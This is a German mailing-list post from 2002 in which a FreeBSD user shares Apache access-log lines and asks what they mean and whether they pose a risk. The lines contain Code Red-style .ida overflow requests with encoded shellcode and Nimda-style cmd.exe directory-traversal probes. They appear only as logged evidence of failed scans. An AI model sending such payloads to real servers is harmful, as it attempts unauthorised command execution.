Komische Web Server logs

From: Florian Unglaub <f.unglaub(at)freenet.de>
Date: Mon, 18 Mar 2002 22:53:35 +0100

Hallo!

Ich betreibe daheim auf meinem FreeBSD 4.5-STABLE T-DSL Router einen
Apache 2 Webserver, auf dem die Homepage unseres Abi Jahrgangs liegt.
Als ich heute mal die httpd-access.log Datei durchgesehen habe, sind
mir komische Einträge aufgefallen:

203.167.85.152 - - [18/Mar/2002:21:54:37 +0100] "GET
/default.ida?NNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u
531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 336 "-" "-"

217.224.160.94 - - [17/Feb/2002:16:17:20 +0100] "GET
/scripts/root.exe?/c+dir HT
TP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:20 +0100] "GET
/MSADC/root.exe?/c+dir HTTP
/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:20 +0100] "GET
/c/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:21 +0100] "GET
/d/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:21 +0100] "GET
/scripts/..%255c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:21 +0100] "GET
/_vti_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:22 +0100] "GET
/_mem_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:22 +0100] "GET
/msadc/..%255c../..%255c../
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:22 +0100] "GET
/scripts/..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:23 +0100] "GET
/scripts/..%c0%2f../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 785 "-" "-"
217.224.160.94 - - [17/Feb/2002:16:17:23 +0100] "GET
/scripts/..%c0%af../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 785 "-" "-"

usw.
Soviel steht fest: Die oben augeführten Dateien gibt es auf meinem
Webserver nicht und sie sehen seht nach Mikkisoft Datein aus.
Kann mir jemand näheres dazu sagen? Mir geht es hauptsächlich darum,
dass jemand mit sowas keinen Schaden bei mir anrichten kann und meine
knappe Bandbreite nicht unnötig verschwendet.

MfG und Danke für euere Bemühungen im Voraus
Florian

-- 
Florian Unglaub <f.unglaub(at)freenet.de>

To Unsubscribe: send mail to majordomo(at)de.FreeBSD.org
with "unsubscribe de-bsd-questions" in the body of the message
Received on Mon 18 Mar 2002 - 22:53:27 CET

search this site